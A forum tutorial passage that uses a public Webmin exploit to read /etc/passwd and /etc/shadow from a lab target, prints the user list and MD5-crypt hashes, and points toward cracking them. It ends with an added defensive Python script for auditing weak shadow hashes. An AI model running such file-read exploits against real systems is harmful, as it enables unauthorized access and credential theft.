
TUTORIAL - Privilege Escalation; Part III

Discussion in 'Privilege Escalation' started by Witranx, Apr 1, 2013.

    ...Continued from Part II
    To get the usernames and passwords on a Linux operating system, we can try to view /etc/passwd.
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/passwd 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /etc/passwd
    FILE CONTENT STARTED
    -----------------------------------
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    dhcp:x:100:101::/nonexistent:/bin/false
    syslog:x:101:102::/home/syslog:/bin/false
    klog:x:102:103::/home/klog:/bin/false
    mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
    obama:x:1001:1001::/home/obama:/bin/bash
    osama:x:1002:1002::/home/osama:/bin/bash
    yomama:x:1003:1003::/home/yomama:/bin/bash
    -------------------------------------

    We now know that the usernames on the target OS are obama, osama, and yomama...
    Next we have to get the passwords from /etc/shadow.
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/shadow 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /etc/shadow
    FILE CONTENT STARTED
    -----------------------------------
    Code:
    root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
    daemon:*:14040:0:99999:7:::
    bin:*:14040:0:99999:7:::
    sys:*:14040:0:99999:7:::
    sync:*:14040:0:99999:7:::
    games:*:14040:0:99999:7:::
    man:*:14040:0:99999:7:::
    lp:*:14040:0:99999:7:::
    mail:*:14040:0:99999:7:::
    news:*:14040:0:99999:7:::
    uucp:*:14040:0:99999:7:::
    proxy:*:14040:0:99999:7:::
    www-data:*:14040:0:99999:7:::
    backup:*:14040:0:99999:7:::
    list:*:14040:0:99999:7:::
    irc:*:14040:0:99999:7:::
    gnats:*:14040:0:99999:7:::
    nobody:*:14040:0:99999:7:::
    dhcp:!:14040:0:99999:7:::
    syslog:!:14040:0:99999:7:::
    klog:!:14040:0:99999:7:::
    mysql:!:14040:0:99999:7:::
    sshd:!:14040:0:99999:7:::
    vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
    obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
    osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
    yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
    Now that we have the encrypted passwords, we can crack them using a privilege escalation tool in BackTrack.
     
    Last edited by a moderator: Jun 22, 2014
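Seen from the defender's side, the `$1$` prefix in the /etc/shadow output above marks MD5-crypt, while `*` and `!` mark accounts with no usable password. The Python below is an added example, not part of the original post: it audits shadow-format entries and reports accounts that still use a weak scheme or have an empty password. The function names and the sample entries are assumptions constructed for illustration.

```python
# Added example: audit shadow(5)-format entries for weak password hash schemes.
# SAMPLE_SHADOW is constructed; the hash strings are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$1$SALTSALT$PLACEHOLDERHASHVALUE00:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
alice:$6$SALTSALT$PLACEHOLDERHASHVALUE01:19000:0:99999:7:::
bob:!$1$SALTSALT$PLACEHOLDERHASHVALUE02:14041:0:99999:7:::
carol::14041:0:99999:7:::
"""

# crypt(3) scheme identifier -> (name, still acceptable?)
SCHEMES = {
    "1": ("md5crypt", False),
    "2a": ("bcrypt", True), "2b": ("bcrypt", True), "2y": ("bcrypt", True),
    "5": ("sha256crypt", True),
    "6": ("sha512crypt", True),
    "y": ("yescrypt", True),
}

def classify(field):
    """Return (status, scheme) for the password field of one shadow entry."""
    if field == "":
        return ("empty-password", None)   # login without any password
    locked = field.startswith("!")        # leading '!' locks the password
    body = field.lstrip("!")
    if body in ("", "*"):
        return ("no-login", None)         # no valid hash: password login disabled
    if not body.startswith("$"):
        # No $id$ prefix: traditional DES crypt or an unrecognised format
        return ("locked" if locked else "weak", "des-or-unknown")
    ident = body.split("$")[1]
    name, acceptable = SCHEMES.get(ident, ("unknown", False))
    if locked:
        return ("locked", name)
    return ("ok" if acceptable else "weak", name)

def audit(text):
    """Return [(user, status, scheme)] for entries that need attention."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or line.startswith("#"):
            continue
        status, scheme = classify(fields[1])
        if status in ("weak", "empty-password"):
            findings.append((fields[0], status, scheme))
    return findings

if __name__ == "__main__":
    for user, status, scheme in audit(SAMPLE_SHADOW):
        print(f"{user}: {status} ({scheme})")
```

Accounts flagged as weak should have their passwords reset after the system's hashing method is moved to a stronger scheme, since existing hashes are only replaced when a password is changed.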
